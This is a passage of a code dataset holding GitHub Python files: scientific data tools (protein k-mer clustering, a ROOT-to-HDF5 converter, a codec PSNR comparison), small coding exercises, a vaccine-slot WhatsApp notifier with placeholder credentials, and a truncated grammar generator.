***')\n\n\nclass Flow:\n class Data:\n def __init__(self, value=None, address=None):\n self.value = value\n self.address = address\n\n class State:\n def __init__(self, frequency=0, cost=0.5):\n self.frequency = frequency\n self.cost = cost\n\ndataflow = Flow.Data\ncomputeflow = Flow.State\n\ndflow = dataflow()\ncflow = computeflow()\n\nprint(dflow.address, dflow.value)\nprint(cflow.frequency, cflow.cost)\nprint('end tutorial')","repo_name":"STEllAR-GROUP/phyfleaux","sub_path":"tutorial/hello-phyflow.py","file_name":"hello-phyflow.py","file_ext":"py","file_size_in_byte":534,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"30529903665","text":"import pandas as pd\nfrom sklearn.metrics.pairwise import pairwise_distances\nfrom scipy import io, sparse\nimport csv\n\n# Get organism ID from protein id \ndef get_organism(s):\n head = s.split('.')[0].rstrip('0123456789')\n return head\n\n# If cosine distance less than this threshold, cluster proteins together\nclustering_threshold = 0.6\n\n# Format input and output\ndata_folder = '/Users/matthewthompson/Documents/UAMS_SURF/K-mer_testing/CSV_files/staph/'\ninput_description = 'staph_3mer_top_9'\noutput_description = input_description + '_' + str(clustering_threshold)\n\n# Read in k-mer count matrix (output from kmerSelector.py)\nsparse_matrix = io.mmread(data_folder + input_description + '.mtx')\nprint(\"Converting to csr_matrix\")\ndf = sparse.csr_matrix(sparse_matrix)\n\n# Proteins are index, kmers are columns\ndf = df.transpose()\n\n# Read in proteins (output from kmerSelector.py)\nproteins = pd.read_csv(data_folder + input_description + '_protein_list.csv')\n\n# Calculate and format distance matrix\nprint(\"Pairwise distance calculation\")\npairwise_distances = pd.DataFrame(pairwise_distances(df, metric='cosine'))\npairwise_distances.columns = proteins.columns\npairwise_distances.index = proteins.columns\n\nelligible = list(pairwise_distances.columns)\n\n# Make a list of precluster centers\n# Make a sub dataframe with 100 proteins\nsubset_columns = elligible[0:101]\n# Reduce the distance matrix to the 100 proteins\nsubset_distances = pairwise_distances[subset_columns]\n# Isolate the 100% duplicate rows across 100 proteins\nsubset_duplicates = subset_distances[subset_distances.duplicated(keep = False)]\n# List of 100% identical proteins\neligible_proteins = list(subset_duplicates.index)\n# Reduce duplicate rows to unique points \ncluster_centers = subset_duplicates.drop_duplicates()\n\nused_points = []\npreclusters = dict()\ncluster_centers = list(cluster_centers.index)\ni = 1\nprint(\"Preclustering exact duplicates\")\nwhile len(cluster_centers) != 0:\n cluster_center = cluster_centers.pop()\n sorted_distances = pairwise_distances.loc[cluster_center].sort_values()\n available_points = sorted_distances[~sorted_distances.index.isin(used_points)]\n identical_points = list(available_points[available_points == 0].index)\n points_under_threshold = list(available_points[available_points < clustering_threshold].index)\n used_points = used_points + points_under_threshold\n used_points.append(cluster_center)\n used_points = list(set(used_points))\n cluster_centers = list(set(cluster_centers) - set(used_points))\n preclusters['clus_' + str(i)] = points_under_threshold\n i+=1\n\npoints_not_in_precluster = list(set(elligible) - set(used_points))\n\n# Store these variables for reference\npoints_without_duplicates = points_not_in_precluster\npoints_with_duplicates = used_points\n\nclusters = 
dict()\npossible_cluster_centers = points_not_in_precluster\nprint(\"Clustering non-duplicate genes\")\nwhile len(possible_cluster_centers) != 0:\n cluster_center = possible_cluster_centers.pop()\n sorted_distances = pairwise_distances.loc[cluster_center].sort_values()\n available_points = sorted_distances[~sorted_distances.index.isin(used_points)]\n points_under_clustering_threshold = list(available_points[available_points < clustering_threshold].index)\n used_points = used_points + points_under_clustering_threshold\n #used_points.append(cluster_center)\n used_points = list(set(used_points))\n possible_cluster_centers = list(set(possible_cluster_centers) - set(used_points))\n clusters['clus_' + str(i)] = points_under_clustering_threshold\n i+=1\n\n# Remove empty clusters\nnon_empty_clusters = dict()\nfor cluster_center in list(clusters.keys()):\n cluster = clusters[cluster_center]\n if len(cluster) > 0:\n non_empty_clusters[cluster_center] = cluster\n\ntotal_clusters = {**preclusters, **non_empty_clusters}\n\n'''\norganism_count = dict()\nfor cluster_center in total_clusters.keys():\n cluster = total_clusters[cluster_center]\n org_list = [get_organism(protein) for protein in cluster]\n org_list = list(set(org_list))\n organism_count[cluster_center] = pd.Series(org_list).value_counts()\n \norganism_count = pd.DataFrame(organism_count)\n\ndf_100 = organism_count.dropna(axis = 1, thresh = 14)\ndf_93 = organism_count.dropna(axis = 1, thresh = 13)\ndf_85 = organism_count.dropna(axis = 1, thresh = 12) \n'''\n\ngrouping_list = dict()\ni = 1\n\n# Reformat clusters for output\nprint(\"Formatting clusters\")\nfor cluster_center in total_clusters.keys():\n formatted_clusters = dict()\n formatted_clusters['c'] = i\n formatted_clusters['points'] = total_clusters[cluster_center]\n clusters[i] = formatted_clusters\n for protein in formatted_clusters['points']:\n grouping_list[protein] = i\n i += 1\n\n# Get ordering of genes (output from kmerCounter.R) to assist with data import into FindMyFriends (grouping.R)\nordered_gene_list = list(pd.read_csv(data_folder + 'find_my_friends_gene_ordering_list.csv')['x'])\n\n# Create list of cluster membership for each protein for output\nout_list = []\nfor entry in ordered_gene_list:\n out_list.append(str(grouping_list[str(entry).strip()]))\ndf_out = pd.DataFrame()\ndf_out['gene'] = ordered_gene_list\ndf_out['clust'] = out_list\n\n# Write cluster membership for each protein (input for grouping.R)\ndf_out.to_csv(data_folder + output_description + '_grouping_list.csv', index = None)\n\n# Write clusters out for comparison with UCLUST\nwith open(data_folder + output_description + '_clusters.txt', 'w') as csv_file:\n writer = csv.writer(csv_file)\n for key, value in total_clusters.items():\n writer.writerow([key, value])","repo_name":"mdttrump97/Kmer_pangenomes","sub_path":"canopyClustering.py","file_name":"canopyClustering.py","file_ext":"py","file_size_in_byte":5607,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"24583669423","text":"from collections import deque\n\na, b = map(int, input().strip().split(' '))\nmes = deque([int(input()) for _ in range(a)])\ncon = [0] * b\n\nfor i in range(b):\n con[i] = mes.popleft()\n\nwhile mes:\n cur = mes.popleft()\n idx = 0\n val = 9999\n for i in range(b):\n if con[i] < val:\n val = con[i]\n idx = i\n con[idx] += 
cur\n\nprint(max(con))\n","repo_name":"seoul-ssafy-class-2-studyclub/Indong-python","sub_path":"Python/SWEA/SW_TEST/line_01.py","file_name":"line_01.py","file_ext":"py","file_size_in_byte":375,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"4497783877","text":"from tqdm import tqdm\nimport argparse\nimport uproot\nimport numpy as np\nimport h5py\n\ndef reader(input_path, nevents=-1, firstevent=0, tree_name=\"\", light=False):\n \n rootfile = uproot.open(input_path)\n if len(rootfile.keys()) == 0:\n raise Exception(f\"Input file {input_path} contains no keys\")\n if tree_name==\"\":\n tree_name = rootfile.keys()[0]\n print(f\"Reading tree {tree_name} ...\")\n tree = rootfile[tree_name]\n\n if nevents<0:\n nevents = tree.num_entries\n lastevent = min(tree.num_entries, firstevent + nevents)\n\n data_array = {}\n\n for branch_name in tree.keys():\n\n arr = tree[branch_name].array(library=\"np\", entry_stop=lastevent,entry_start=firstevent)\n\n if isinstance(arr[0],uproot.STLVector):\n\n if light: #skip branches containing 2D arrays\n continue\n\n arr = np.array([ #branch\n np.array([ #event\n np.array( #row\n np.array(row.tolist() if len(row)!=0 else [np.NaN]) #column\n )\n for row in event\n ],dtype=object)\n for event in arr\n ],dtype=object)\n\n data_array[branch_name] = arr\n \n return data_array\n\ndef pad_array(arr,_max_length = (-1,-1)):\n\n if arr[0].dtype==object and hasattr(arr[0][0], '__iter__'): #array of 2-dimensional arrays\n pad_with = np.NaN if arr[0][0].dtype.kind == 'f' else -9999\n lengths_0 = [len(event) for event in arr]\n lengths_1 = [ [len(node) for node in event] for event in arr]\n max_length_0 = max(lengths_0) if _max_length[0] < 0 else _max_length[0]\n max_length_1 = max([max(node_lengths) if len(node_lengths)!=0 else 0 for node_lengths in lengths_1]) if _max_length[1] < 0 else _max_length[1]\n\n padded_arr = np.stack([\n np.pad(\n pad_array(event,(max_length_1,-1)),\n [(0, max_length_0 - lengths_0[idx]),(0,0)],\n \"constant\",\n constant_values = pad_with\n )\n for idx, event in enumerate(arr)\n ]).astype('float32')\n\n else:\n pad_with = np.NaN if arr[0].dtype.kind == 'f' else -9999\n lengths = [len(event) for event in arr]\n max_length = max(lengths) if _max_length[0] < 0 else _max_length[0]\n\n padded_arr = np.stack([\n np.pad(\n event, \n (0, max_length - lengths[idx]),\n \"constant\",\n constant_values = pad_with\n )\n for idx, event in enumerate(arr)\n ])\n\n return padded_arr\n\ndef writer(output_path,data_array,save_jagged=True):\n\n file = h5py.File(output_path, 'w')\n\n print(\"Writing branches...\")\n for branch_name, branch_array in tqdm(data_array.items()):\n num_entries = len(branch_array)\n\n # for saving jagged arrays, see https://docs.h5py.org/en/stable/special.html#arbitrary-vlen-data\n # (not supported for branches storing 2D arrays)\n if save_jagged and branch_array[0].dtype!=object:\n shape = (num_entries, )\n dt = h5py.vlen_dtype(np.dtype('float32'))\n\n else:\n branch_array = pad_array(branch_array)\n shape = branch_array.shape\n dt = type(branch_array[0][0][0])\n\n dataset = file.create_dataset(\n branch_name,\n shape,\n dtype=dt,\n compression=\"gzip\",\n chunks=True)\n\n for idx,event in enumerate(branch_array):\n dataset[idx] = event\n\n file.close()\n print(\"Output written to \",output_path)\n\n\ndef main():\n\n parser = argparse.ArgumentParser()\n parser.add_argument(\"-i\",\"--input\", dest=\"input\", type=str, help=\"path to input ROOT file\", required=True)\n 
parser.add_argument(\"-t\",\"--tree\", dest=\"tree\", type=str, help=\"name of TTree\", default=\"\")\n parser.add_argument(\"-o\",\"--output\", dest=\"output\", type=str, help=\"path to output h5 file\", default=\"\")\n parser.add_argument(\"-n\",\"--nevents\", dest=\"nevents\", type=int, help=\"number of events to parse\", default=-1)\n parser.add_argument(\"-s\",\"--start\", dest=\"start\", type=int, help=\"event to start on\", default=0)\n parser.add_argument(\"-j\",\"--jagged\", dest=\"save_jagged\", type=int, help=\"save output as jagged array (alternative is padded array)\", default=1)\n parser.add_argument(\"-l\",\"--light\", dest=\"light\", type=int, help=\"do not save expensive branches containing 2D arrays\", default=0)\n args = parser.parse_args()\n\n if args.output == \"\":\n args.output = args.input.replace(\".root\",\".h5\")\n\n data_array = reader(args.input, args.nevents, args.start, args.tree, bool(args.light))\n writer(args.output,data_array, bool(args.save_jagged))\n\nif __name__ == '__main__':\n main()","repo_name":"cocoa-hep/cocoa-hep","sub_path":"COCOA/util/dump_hdf5.py","file_name":"dump_hdf5.py","file_ext":"py","file_size_in_byte":4920,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"61"} +{"seq_id":"37855392431","text":"import sys\nimport unicodedata\n\n\nSTART_EMOJI_RANGE = 100000 # estimate\nNOT_FOUND = \"Not found\"\n\n\ndef what_means_emoji(emoji):\n \"\"\"Receives emoji and returns its meaning,\n in case of a TypeError return 'Not found'\"\"\"\n try:\n return unicodedata.name(emoji)\n except (TypeError, ValueError):\n return NOT_FOUND\n\n\ndef _make_emoji_mapping():\n \"\"\"Helper to make a mapping of all possible emojis:\n - loop through range(START_EMOJI_RANGE, sys.maxunicode +1)\n - return dict with keys=emojis, values=names\"\"\"\n for codepoint in range(START_EMOJI_RANGE, sys.maxunicode + 1):\n emoji = chr(codepoint)\n name = what_means_emoji(emoji)\n if name != NOT_FOUND:\n yield emoji, name\n\n\ndef find_emoji(term):\n \"\"\"Return emojis and their texts that match (case insensitive)\n term, print matches to console\"\"\"\n term = term.lower()\n\n emoji_mapping = _make_emoji_mapping()\n\n for emoji, name in emoji_mapping:\n if term in name.lower():\n print(name, emoji)\n","repo_name":"jarnoli/pybites","sub_path":"126/emoji.py","file_name":"emoji.py","file_ext":"py","file_size_in_byte":1027,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"5717838693","text":"from eventsourcing.application import AggregateNotFound\n\nfrom base import SqliteTestCase\nfrom common.domain.entities import User\nfrom common.domain.manager import Manager\nfrom common.models.errors import BadRequest\n\n\nclass TestWithdraw(SqliteTestCase):\n\n def setUp(self) -> None:\n super().setUp()\n\n self.user_id = 'user-1'\n self.amount = 100\n self.manager = Manager()\n\n def test_withdraw_for_non_existing_user_fail(self):\n self.assertRaises(AggregateNotFound, self.manager.user_withdraw, self.user_id, self.amount)\n\n def test_withdraw_for_existing_user_success(self):\n self.manager.user_deposit(self.user_id, self.amount)\n self.manager.user_withdraw(self.user_id, self.amount)\n\n user = self.manager.repository.get(User.create_id(self.user_id))\n\n self.assertEqual(user.balance, 0)\n\n def test_withdraw_insufficient_funds_fail(self):\n self.manager.user_deposit(self.user_id, self.amount)\n self.manager.user_withdraw(self.user_id, self.amount)\n\n self.assertRaises(BadRequest, 
self.manager.user_withdraw, self.user_id, self.amount)\n","repo_name":"ahmdatef/mini-exchange","sub_path":"tests/test_withdraw.py","file_name":"test_withdraw.py","file_ext":"py","file_size_in_byte":1123,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"27060333597","text":"import argparse\nimport os\nimport subprocess\n\nimport math\nimport pandas as pd\nfrom matplotlib import pyplot as plt\n\nfrom Decoder import Decoder as Decoder\nfrom Encoder import Encoder as Encoder\n\nVIDEO_WIDTH = 416\nVIDEO_HEIGHT = 240\nVIDEO_SUFFIX = '.y'\nDATA_ROOT_PATH = 'dat'\nDATA_SUFFIX = '.dat'\nVIDEOS_PATH = 'videos/original'\nMPEG_OUTPUT = f'videos/test/MPEG2'\nHEVC_OUTPUT = f'videos/test/HEVC'\nOUR_OUTPUT = f'videos/test/our'\n\n# Adjust on your machine\nVIDEO_PSNR_TOOL_PATH = 'tools/psnr-raw-video/bin/GNU-9.3.0/psnrRaw'\n\nNO_FRAMES = {\n 'BasketballPass_416x240_50Hz_P400': {'n_frames': 501, 'fr': 50},\n 'BQSquare_416x240_60Hz_P400': {'n_frames': 601, 'fr': 60},\n 'Johnny_416x240_60Hz_P400': {'n_frames': 600, 'fr': 60},\n 'RaceHorses_416x240_30Hz_P400': {'n_frames': 300, 'fr': 30},\n}\n\ndef generate_data():\n df_our = pd.DataFrame(columns=['bpp', 'db'])\n df_mpeg2 = pd.DataFrame(columns=['bpp', 'db'])\n df_hevc = pd.DataFrame(columns=['bpp', 'db'])\n\n if not os.path.exists(MPEG_OUTPUT):\n os.makedirs(MPEG_OUTPUT)\n\n if not os.path.exists(HEVC_OUTPUT):\n os.makedirs(HEVC_OUTPUT)\n\n if not os.path.exists(OUR_OUTPUT):\n os.makedirs(OUR_OUTPUT)\n\n for video in os.listdir(VIDEOS_PATH):\n filename = video.split('.')[0]\n n_frames = NO_FRAMES.get(filename)['n_frames']\n f_rate = NO_FRAMES.get(filename)['fr']\n \"\"\"\n Our codec\n \"\"\"\n for index, qp in enumerate([8, 12, 16, 20, 24]):\n export_filename = f'{OUR_OUTPUT}/{filename}_QP_{qp}'\n # Encode\n enc = Encoder(f'{VIDEOS_PATH}/{filename}.y', f'{export_filename}.txt', 16, qp, True)\n enc.encode_video(VIDEO_WIDTH, VIDEO_HEIGHT, n_frames, 16)\n # Decode\n dec = Decoder(f'{export_filename}.txt', f'{export_filename}.y', pgm=False)\n dec.decode_all_frames()\n\n # Run PSNR tool\n process = subprocess.run(\n [VIDEO_PSNR_TOOL_PATH, str(VIDEO_WIDTH), str(VIDEO_HEIGHT), \"400\", f'{VIDEOS_PATH}/{filename}.y',\n f'{export_filename}.y', f'{export_filename}.txt', str(f_rate)], stdout=subprocess.PIPE)\n\n stdout = process.stdout.decode(\"utf-8\")\n out = (stdout.split('\\n\\n')[2]).split()\n bpp, db = float(out[0]), float(out[1])\n db = 0.0 if math.isinf(db) else db\n df_our.loc[index] = [bpp, db]\n\n # Store PSNR data\n version_path = os.path.join(DATA_ROOT_PATH, 'our')\n if not os.path.exists(version_path):\n os.mkdir(version_path)\n df_our.to_pickle(os.path.join(version_path, filename + DATA_SUFFIX))\n\n \"\"\"\n MPEG-2\n \"\"\"\n for index, qp in enumerate(range(2, 20)):\n export_filename = f'{MPEG_OUTPUT}/{filename}_QP_{qp}'\n # encode\n os.system(f'ffmpeg -f rawvideo -pix_fmt gray -s:v 416x240 -r 50.0 -i {VIDEOS_PATH}/{filename}.y \\\n -c:v mpeg2video -qscale:v {qp} -g 600 -bf 0 -vframes {n_frames} {export_filename}.mpg')\n # decode\n os.system(\n f'ffmpeg -i {export_filename}.mpg -c:v rawvideo -pix_fmt gray {export_filename}.yuv')\n\n # # Run PSNR tool\n process = subprocess.run(\n [VIDEO_PSNR_TOOL_PATH, str(VIDEO_WIDTH), str(VIDEO_HEIGHT), \"400\", f'{VIDEOS_PATH}/{filename}.y',\n f'{export_filename}.yuv', f'{export_filename}.mpg', str(f_rate)], stdout=subprocess.PIPE)\n\n stdout = process.stdout.decode(\"utf-8\")\n out = (stdout.split('\\n\\n')[2]).split()\n bpp, db = float(out[0]), 
float(out[1])\n db = 0.0 if math.isinf(db) else db\n df_mpeg2.loc[index] = [bpp, db]\n\n # Store PSNR data\n # TODO: Investigate why DataFrame is empty after reading from filesystem\n version_path = os.path.join(DATA_ROOT_PATH, 'mpeg2')\n if not os.path.exists(version_path):\n os.mkdir(version_path)\n df_mpeg2.to_pickle(os.path.join(version_path, filename + DATA_SUFFIX))\n\n \"\"\"\n HEVC\n \"\"\"\n for index, qp in enumerate(range(8, 32)):\n export_filename = f'{HEVC_OUTPUT}/{filename}_QP_{qp}'\n # encode\n os.system(\n f'ffmpeg -f rawvideo -pix_fmt gray -s:v 416x240 -r 50.0 -i {VIDEOS_PATH}/{filename}.y -c:v libx264 -crf {qp} -g 600 -bf 0 -vframes {n_frames} {export_filename}.mp4')\n # decode\n os.system(f'ffmpeg -i {export_filename}.mp4 -c:v rawvideo -pix_fmt gray {export_filename}.yuv')\n\n process = subprocess.run(\n [VIDEO_PSNR_TOOL_PATH, str(VIDEO_WIDTH), str(VIDEO_HEIGHT), \"400\", f'{VIDEOS_PATH}/{filename}.y',\n f'{export_filename}.yuv', f'{export_filename}.mp4', str(f_rate)], stdout=subprocess.PIPE)\n\n stdout = process.stdout.decode(\"utf-8\")\n out = (stdout.split('\\n\\n')[2]).split()\n bpp, db = float(out[0]), float(out[1])\n db = 0.0 if math.isinf(db) else db\n df_hevc.loc[index] = [bpp, db]\n\n # Store PSNR data\n version_path = os.path.join(DATA_ROOT_PATH, 'HEVC')\n if not os.path.exists(version_path):\n os.mkdir(version_path)\n df_hevc.to_pickle(os.path.join(version_path, filename + DATA_SUFFIX))\n\ndef plot_data(filename, version, versions):\n versions = versions.split(',') + [version] if versions else [version]\n\n plt.figure(figsize=(20, 12))\n for version in versions:\n ver = pd.DataFrame(pd.read_pickle(os.path.join(\n DATA_ROOT_PATH, version, filename + DATA_SUFFIX)))\n plt.plot(ver['bpp'], ver['db'], label=version)\n\n plt.xlabel('X: Bits (bpp)')\n plt.ylabel('Y: PSNR (db)')\n plt.legend()\n plt.title(filename)\n plt.savefig(\"PSNR_\" + filename + \".pdf\")\n plt.show()\n\ndef parse_args():\n parser = argparse.ArgumentParser(\n description='Tests encoder quality of a video')\n parser.add_argument('-nogenerate', dest='nogenerate', action='store_true',\n help='optional: if set, no new data is computed but version curves are plotted')\n args = parser.parse_args()\n return args\n\n\nif __name__ == '__main__':\n args = parse_args()\n if not args.nogenerate:\n generate_data()\n\n for video in os.listdir(VIDEOS_PATH):\n filename = video.split('.')[0]\n plot_data(filename,\"our\",\"HEVC,mpeg2\")\n","repo_name":"FUHannes/IVC","sub_path":"comparison_MPEG2_HEVC.py","file_name":"comparison_MPEG2_HEVC.py","file_ext":"py","file_size_in_byte":6423,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"17134793183","text":"\nimport random\n\nimport numpy as np\n\nimport pandas as pd\n\nfrom pyecharts import WordCloud\n\nimport matplotlib.pyplot as plt\n\nfrom PIL import Image,ImageSequence\n\nfrom wordcloud import WordCloud,ImageColorGenerator\n\ndef DrawWordcloud(read_name):\n\n image = Image.open('src.jpg')# image used as the background shape\n\n graph = np.array(image)\n\n # parameters: the font, background color, maximum word size, and the given image as the mask shape\n\n wc = WordCloud(font_path = 'C:\\\\windows\\\\Fonts\\\\simhei.ttf', background_color = 'White', max_words = 50, mask = graph)\n\n fp = pd.read_csv(read_name)# read the word-frequency file\n\n name = list(fp.name)# words\n\n value = fp.val# word frequencies\n\n for i in range(len(name)):\n\n name[i] = str(name[i])\n\n # note: decode so Chinese characters display correctly (Python 2 str; this decode call would fail on a Python 3 str)\n\n name[i] = name[i].decode('gb2312')\n\n dic = dict(zip(name, value))# store the word frequencies as a dict\n\n wc.generate_from_frequencies(dic)# generate the word cloud from the given frequencies\n\n image_color 
= ImageColorGenerator(graph)\n\n plt.imshow(wc)\n\n plt.axis(\"off\")# hide the axes\n\n plt.show()\n\n wc.to_file('Wordcloud.png')# save the image as Wordcloud.png\n\nif __name__=='__main__':\n\n DrawWordcloud(\"price.csv\")\n","repo_name":"houzhenguo/python","sub_path":"douban.py","file_name":"douban.py","file_ext":"py","file_size_in_byte":1224,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"30439280320","text":"string = \"\"\r\nfile = input(\"file name?\")\r\nf = open (file+\".txt\", \"r\")\r\nlines = f.readlines()\r\nici = False\r\nfor x in lines:\r\n\tif \"invariant\" in x:\r\n\t\tici = True\r\n\telse:\r\n\t\tif \"T-SEMI-FLOWS\" in x:\r\n\t\t\tici = False\r\n\tif ici == True:\r\n\t\tstring +=x\r\ntabplace = []\r\nfor x in range(0,len(string)):\r\n\tstartsemi = 0\r\n\tpoid = 0\r\n\tnbinvar = 0;\r\n\tchar = string[x]\r\n\tsemistart = 0\r\n\tif char == \"(\":\r\n\t\tpoid = int(string[x+1])\r\n\t\tnbinvar += 1\r\n\t\tbufsemi = \"\"\r\n\t\ttabcouple = []\r\n\t\tnbplace = 0;\r\n\t\tfor a in range(0,x):\r\n\t\t\tbufsemi = bufsemi + string[a+semistart]\r\n\t\t\tif string[a+semistart] == \"{\":\r\n\t\t\t\tbufplace = \"\"\r\n\t\t\t\tplacestart = a+semistart+1\r\n\t\t\t\twhile string[placestart] != \"}\":\r\n\t\t\t\t\tbufplace = bufplace + string[placestart]\r\n\t\t\t\t\tplacestart +=1\r\n\t\t\t\tif string[placestart+1] == '*':\r\n\t\t\t\t\tpoid = int(poid/int(string[placestart+2]))\r\n\t\t\t\ttabplace.append((bufplace,poid))\r\n\t\t\t\tnbplace += 1\r\n\t\tsemistart = x+3\r\ncount = 0\r\nfinaltab = []\r\nfor place in tabplace:\r\n\tnbdouble = 0\r\n\tif place in tabplace:\r\n\t\tbuftab = tabplace[:]\r\n\t\tsmallerpoid = place[1]\r\n\t\tfor c in range(tabplace.index(place), len(tabplace)):\r\n\t\t\tp = place[0]\r\n\t\t\tbufp = tabplace[c][0]\r\n\t\t\tif p == bufp:\r\n\t\t\t\tif smallerpoid > tabplace[c][1]:\r\n\t\t\t\t\tsmallerpoid = tabplace[c][1]\r\n\t\t\t\tbuftab.remove(tabplace[c])\r\n\t\tfinaltab.append((place[0],smallerpoid))\r\n\ttabplace = buftab[:]\r\n\tcount +=1\r\n\r\nfor x in range(0,len(finaltab)):\r\n\tprint(finaltab[x])\r\n","repo_name":"Trithuan/r-seau-petri","sub_path":"borne_invariant.py","file_name":"borne_invariant.py","file_ext":"py","file_size_in_byte":1400,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"8843809620","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat May 8 08:33:42 2021\n\n@author: abc\n\"\"\"\n\n\nimport requests\nimport json\nfrom datetime import date\nfrom twilio.rest import Client\nfrom datetime import timedelta\n\n\ndef send_notification(response, contact_directory, district,day):\n response_dict = json.loads(response.content)\n sessions = response_dict['sessions']\n print(response_dict)\n message = \"{} Vaccine Availability for district {} : \".format(day, district)\n count = 1\n for session in sessions:\n message = '{} \\n {}- name : {} , pincode : {} , for age above : {} , availability : {} , available vaccine : {}'.format(message,count ,session['name'],session['pincode'] ,session['min_age_limit'],session['available_capacity'] ,session['vaccine'] )\n count = count+1 \n\n if len(sessions)>0:\n twilio_sid = 'SID'\n auth_token = 'Token'\n whatsapp_client = Client(twilio_sid, auth_token)\n \n for key, value in contact_directory.items():\n msg_loved_ones = whatsapp_client.messages.create(\n body = message,\n from_= 'whatsapp:+14155238886',\n to='whatsapp:' + value,\n\n )\n \ndef call(request): \n \n headers={'User-Agent': 
'PostmanRuntime/7.26.8',\n 'Accept': 'application/json',\n 'Accept-Language': 'hi_IN',\n 'Host': 'cdn-api.co-vin.in'}\n today = date.today().strftime(\"%d-%m-%Y\")\n tomorrow = (date.today() + timedelta(days=1)).strftime(\"%d-%m-%Y\")\n\n \n response_gondia = requests.get(\"https://cdn-api.co-vin.in/api/v2/appointment/sessions/public/findByDistrict?district_id=378&date={}\".format(today),headers=headers,verify=False)\n response_gondia_tomorrow = requests.get(\"https://cdn-api.co-vin.in/api/v2/appointment/sessions/public/findByDistrict?district_id=378&date={}\".format(tomorrow),headers=headers,verify=False)\n contact_directory_gondia = {'Jenu':'+91123456789'}\n \n send_notification(response_gondia,contact_directory_gondia, 'Gondia',\"Today's\")\n send_notification(response_gondia_tomorrow,contact_directory_gondia, 'Gondia',\"Tomorrow's\")\n \n","repo_name":"jainita95/Cowin-Vaccine-Tracker-GCP-cloud-Function","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2190,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"28143518714","text":"# 9012_Parentheses (Baekjoon)\n\ncmd = int(input())\nopen_cnt = 0\nclose_cnt = 0\n\nfor i in range(0,cmd):\n arr = list(input())\n for j in range(0,len(arr)):\n if arr[j] == \"(\":\n open_cnt += 1\n if arr[j] == \")\":\n close_cnt += 1\n\n if close_cnt > open_cnt:\n break\n if close_cnt == open_cnt:\n print(\"YES\")\n else:\n print(\"NO\")\n open_cnt = 0\n close_cnt = 0","repo_name":"youjeonghan/BackJoon_Algorithm","sub_path":"자료구조/9012_괄호.py","file_name":"9012_괄호.py","file_ext":"py","file_size_in_byte":413,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"25942420774","text":"#!/usr/bin/env python3.5\n\n# Problem: Perimeter of squares in a rectangle\n\"\"\"\nThe drawing shows 6 squares the sides of which have a length of 1,1,2,3,5,8. 
It's\neasy to see that the sum of the perimeters of these squares is:\n4 * (1 + 1 + 2 + 3 + 5 + 8) = 4 * 20 = 80\n\nCould you give the sum of the perimeters of all the squares in a rectangle when there are n + 1 squares disposed in the same manner as in the drawing:\n\n\n# Hint: See Fibonacci sequence\n\n# Ref: https://oeis.org/A000045\n\nThe function perimeter takes a parameter n, where n+1 is the number of squares (they are\nnumbered from 0 to n), and returns the total perimeter of all the squares.\n\n\n\"\"\"\n\n\ndef perimeter(n):\n l = [1,1]\n for i in range(2,n+1):\n l.append(l[i-2] + l[i-1])\n return sum(l) * 4\n\n\n# Other Solutions:\n\n# Solution 1: By EarlGrey\n\ndef fib(n):\n a, b = 0, 1\n\n for i in range(n+1):\n if i == 0:\n yield b\n else:\n a, b = b, a+b\n yield b\ndef perimeter(n):\n return sum(fib(n)) * 4\n\n# Solution 2: By Lechevalier\n\ndef perimeter(n):\n a, b = 1, 2\n while n:\n a, b, n = b, a + b, n - 1\n return 4 * (b - 1)\n\nprint(list(fib(3)))  # fib is a generator, so materialize it before printing\nprint(perimeter(1))\n","repo_name":"patricksile/code_folder","sub_path":"code_wars/5kyu_perimeter_squares_rectangle.py","file_name":"5kyu_perimeter_squares_rectangle.py","file_ext":"py","file_size_in_byte":1182,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"70928815553","text":"# coding=utf-8\n\n\"\"\"Probabilistic Context Free Grammar.\"\"\"\n\nfrom collections import defaultdict\nimport random\nimport re\nimport sys\nimport os\n\n\nVERBS = {\"research\": \"researching\", \"mine\": \"mining\", \"craft\": \"crafting\"}\n\n\nclass MaximumDepthExceeded(Exception):\n \"\"\"Exception that is raised if the parse tree runs too deep.\"\"\"\n\n pass\n\n\nclass SymbolNotFound(Exception):\n \"\"\"Fix yo grammar.\"\"\"\n\n pass\n\n\nclass Grammar(object):\n\n grammars = {}\n\n def __init__(self, grammar_string):\n self.grammar = self.parse_grammar(grammar_string)\n\n @classmethod\n def load(cls, grammar_file):\n with open(\n os.path.join(\n os.path.dirname(os.path.abspath(__file__)),\n \"data\",\n grammar_file + \".grammar\",\n )\n ) as f:\n cls.grammars[grammar_file] = cls(f.read())\n return cls.grammars[grammar_file]\n\n def weighted_choice(self, options, weights):\n \"\"\"Choose a random item, according to weights.\n\n Args:\n options: list\n weights: list of floats -- don't have to add up to 1\n Returns:\n element of options\n \"\"\"\n target = random.random() * sum(weights)\n acc = 0\n for idx, weight in enumerate(weights):\n acc += weight\n if acc > target:\n return options[idx]\n\n def parse_grammar(self, grammar):\n \"\"\"Return a dictionary mapping symbols to extensions.\n\n Example:\n >>> grammar = '''\n @s -> @n @v\n @s -> @n @v @n\n @n -> dog | cat\n @v -> chases %3 | eats %2.0'''\n >>> parse_grammar(grammar)\n {\n \"@s\": [\n [ \"@n @v\", 0.5 ],\n [ \"@n @v @n\", 0.5 ]\n ],\n \"@v\": [\n [ \"chases\", 0.6 ],\n [ \"eats\", 0.4 ]\n ],\n \"@n\": [\n [ \"dog\", 0.5 ],\n [ 